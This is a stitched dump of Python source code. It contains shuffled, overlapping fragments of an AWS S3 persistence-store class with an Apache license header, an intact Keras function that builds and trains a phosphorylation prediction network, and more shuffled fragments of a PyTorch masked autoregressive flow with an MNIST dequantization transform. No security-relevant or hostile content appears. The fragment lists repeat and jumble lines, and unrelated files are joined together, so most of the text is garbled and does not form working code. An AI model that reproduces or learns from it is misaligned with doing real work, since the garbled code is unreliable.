"persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import",
"from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class",
"self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data,",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"Hat Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS S3 as",
"file except in compliance with the License. # You may obtain a copy",
"s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def",
"self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region,",
"save Bigquery Data, it uses AWS S3 as of now as data store.\"\"\"",
"data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client:",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"Red Hat Inc. # # Licensed under the Apache License, Version 2.0 (the",
"AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'):",
"License for the specific language governing permissions and # limitations under the License.",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"and # limitations under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation",
"the License. # You may obtain a copy of the License at #",
"language governing permissions and # limitations under the License. # # Author: <NAME>",
"AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store",
"aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" #",
"to in writing, software # distributed under the License is distributed on an",
"the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\"",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id,",
"the specific language governing permissions and # limitations under the License. # #",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"# Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from",
"implied. # See the License for the specific language governing permissions and #",
"logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses",
"\"License\"); # you may not use this file except in compliance with the",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data) logger.info('Updated file",
"required by applicable law or agreed to in writing, software # distributed under",
"import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence",
"applicable law or agreed to in writing, software # distributed under the License",
"SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after",
"data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing",
") def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating",
"raise Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists,",
"\"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings",
"filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json",
"self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data)",
"specific language governing permissions and # limitations under the License. # # Author:",
"License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import",
"or agreed to in writing, software # distributed under the License is distributed",
"bucket.\"\"\" # connect after creating or with existing s3 client self.s3_client.connect() if not",
"local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect",
"Bigquery Data, it uses AWS S3 as of now as data store.\"\"\" def",
"or implied. # See the License for the specific language governing permissions and",
"bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing s3",
"bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3",
"import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger =",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict() if",
"with the License. # You may obtain a copy of the License at",
"= s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name,",
"PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS S3 as of",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.')",
"it uses AWS S3 as of now as data store.\"\"\" def __init__(self, s3_client=None):",
"in writing, software # distributed under the License is distributed on an \"AS",
"\"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client",
"= s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services )",
"S3 as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\"",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the"
] |
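To make the read-merge-write flow above concrete, here is a minimal offline usage sketch of PersistenceStore.update(). Everything specific in it is hypothetical: the bucket name and payloads are made up, and a MagicMock stands in for the rudra AmazonS3 client, whose methods are assumed to behave only as the calls above imply.

from unittest.mock import MagicMock

# Stand-in for rudra.data_store.aws.AmazonS3 so the sketch runs offline.
s3_client = MagicMock()
s3_client.is_connected.return_value = True
s3_client.object_exists.return_value = True
s3_client.read_json_file.return_value = {'existing-key': 1}

store = PersistenceStore(s3_client=s3_client)
store.update(data={'new-key': 2}, bucket_name='example-bucket')

# The merged document should have been written back under the default filename.
s3_client.write_json_file.assert_called_once_with(
    'collated.json', {'existing-key': 1, 'new-key': 2})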
# <filename>methods/model_n.py
import functools
import itertools
import os
import random

import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from sklearn import metrics
from sklearn import preprocessing
from sklearn.model_selection import train_test_split, KFold, cross_val_score
from keras.layers import Dense, Activation, Flatten, Dropout, Reshape
from keras.layers import Conv1D, Conv2D, MaxPooling2D
from keras.models import Sequential, Model
from keras.utils.np_utils import to_categorical
from keras import optimizers
from keras.optimizers import Adam, SGD
from keras.layers.normalization import BatchNormalization
from keras.regularizers import l2
import copy


def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60, weights=None):
    nb_classes = 2
    img_dim1 = X_train1.shape[1:]
    img_dim2 = X_train2.shape[1:]
    img_dim3 = X_train3.shape[1:]

    ########## parameters #########
    init_form = 'RandomUniform'
    learning_rate = 0.001
    nb_dense_block = 1
    nb_layers = 5
    nb_filter = 32
    growth_rate = 32
    # growth_rate = 24
    filter_size_block1 = 13
    filter_size_block2 = 7
    filter_size_block3 = 3
    filter_size_ori = 1
    dense_number = 32
    dropout_rate = 0.2
    dropout_dense = 0.3
    weight_decay = 0.0001
    nb_batch_size = 512

    ###################
    # Construct model #
    ###################
    from methods.phosnet import Phos
    model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3,
                 init_form, nb_dense_block, growth_rate,
                 filter_size_block1, filter_size_block2, filter_size_block3,
                 nb_filter, filter_size_ori, dense_number,
                 dropout_rate, dropout_dense, weight_decay)

    # Model output
    # choose optimization
    opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
    # model compile
    model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])

    # load weights
    if weights is not None:
        model.load_weights(weights)
        # model2 = copy.deepcopy(model)
        model2 = model  # NOTE: model2 aliases model (deepcopy is commented out),
        # so the layer-by-layer copy below is effectively a no-op.
        model2.load_weights(weights)
        for num in range(len(model2.layers) - 1):
            model.layers[num].set_weights(model2.layers[num].get_weights())

    if nb_epoch > 0:
        model.fit([X_train1, X_train2, X_train3], y_train,
                  batch_size=nb_batch_size,
                  # validation_data=([X_val1, X_val2, X_val3], y_val),
                  # validation_split=0.1,
                  epochs=nb_epoch, shuffle=True, verbose=1)
    return model
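The weight-loading branch in model_net() relies on Keras's get_weights()/set_weights() pair to copy parameters layer by layer between two models. Below is a self-contained sketch of that idiom on a toy two-layer network (illustrative only, not the Phos architecture), assuming a standard Keras installation.

import numpy as np
from keras.models import Sequential
from keras.layers import Dense

def make_net():
    # Tiny stand-in network; the shapes are arbitrary.
    return Sequential([Dense(8, activation='relu', input_shape=(4,)),
                       Dense(1, activation='sigmoid')])

source, target = make_net(), make_net()

# Copy every layer except the last, mirroring the loop in model_net().
for num in range(len(source.layers) - 1):
    target.layers[num].set_weights(source.layers[num].get_weights())

# The first layer's weights now match; the last layer's stay independent.
assert all(np.allclose(a, b) for a, b in
           zip(target.layers[0].get_weights(), source.layers[0].get_weights()))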
[
"for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], []))",
"- 0.5) * (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha +",
"hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac =",
"batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z,",
"torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def",
"torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape),",
"def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha =",
"dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown",
"else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image)",
"= torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise",
"def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape",
"= (torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0., 1.) return",
"\\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1.,",
"= inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] !=",
"== 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\",
"= self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path):",
"image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image",
"ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)]",
"torchvision.transforms as T from .MADE import MADE from .Shuffle import Shuffle from .Flow",
"with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x",
"conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ =",
"x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self,",
"T from .MADE import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow",
"logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim])",
"True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape =",
"self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\"",
"= SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for",
"save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict",
"self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\":",
"condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim,",
"device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs,",
"Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import",
"__init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01",
"\"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device)",
"self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image)",
"inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and",
"= conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions)",
"raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) -",
"_ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\":",
"import torch import torch.nn as nn import torchvision.transforms as T from .MADE import",
"state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a",
"= torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a +",
"import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import",
"self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), },",
"path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input",
"(torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha",
"self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0.,",
".Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class",
"__call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image",
"import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim,",
"= self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image +",
"= device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim),",
"}, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform",
"def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.)",
"flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim",
"0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ +",
"\\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]],",
"self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions):",
"inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized =",
"= T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image):",
"conditions) return x def save(self, path): torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path)",
"from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log",
"return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z =",
"self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1 - 2a)",
"MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha",
"with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return",
"condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized =",
"torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError",
"conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if",
"SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def",
"torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self,",
"NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions",
"not self.initialized and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs,",
"utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF,",
"T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image =",
"condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks",
"* image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset",
"= inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized",
"from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self,",
"in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform",
"torch.save({ \"model\": self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path,",
"\"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(),",
"if dataset == \"mnist\": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise",
"ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim,",
"logit(a + (1 - 2a) * image) as in paper \"\"\" class MAFImageTransform():",
"torch.nn as nn import torchvision.transforms as T from .MADE import MADE from .Shuffle",
"conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack",
"RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks,",
"super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device =",
"def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions =",
"conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def",
"= conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack todo",
"dataset\") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) *",
"= True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape",
"def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to",
"input logit(a + (1 - 2a) * image) as in paper \"\"\" class",
"1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z,",
"in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior",
"image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 *",
"- 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0.,",
"def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim",
"num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim",
"[[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized",
"import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger",
"self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({",
"as T from .MADE import MADE from .Shuffle import Shuffle from .Flow import",
"in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not",
"to dequantize input logit(a + (1 - 2a) * image) as in paper",
"device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device",
"(1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2",
"as nn import torchvision.transforms as T from .MADE import MADE from .Shuffle import",
"\"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"])",
"\"\"\" uniform noise to dequantize input logit(a + (1 - 2a) * image)",
"hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks -",
"self.model.state_dict(), \"optimizer\": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict[\"model\"])",
"False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def",
"if not self.initialized and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad():",
"image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if dataset ==",
"from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device):",
"!= 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True",
"z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self,",
"2a) * image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset): if",
"[])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self,",
"self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs,",
"todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs,",
"z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size,",
"self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model",
"raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim)",
"0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image = self.base_transform(image) noise =",
"0.5) * (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1",
"= (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 * self.alpha)",
"Shuffle(torch.randperm(flow_dim))] \\ for ind in range(num_blocks - 1)] \\ + [[MADE(flow_dim, condition_dim, hidden_dim,",
"T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError(\"Unknown dataset\") def __call__(self, image): image",
"= self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with",
".MADE import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions",
"hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim =",
"self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1])",
"logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0]",
"map_location=self.device) self.model.load_state_dict(state_dict[\"model\"]) self.optimizer.load_state_dict(state_dict[\"optimizer\"]) \"\"\" uniform noise to dequantize input logit(a + (1 -",
"* (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 -",
"__init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim =",
"import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__()",
"- 2a) * image) as in paper \"\"\" class MAFImageTransform(): def __init__(self, dataset):",
".Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from",
"self.initialized and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions)",
"import torchvision.transforms as T from .MADE import MADE from .Shuffle import Shuffle from",
"calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs",
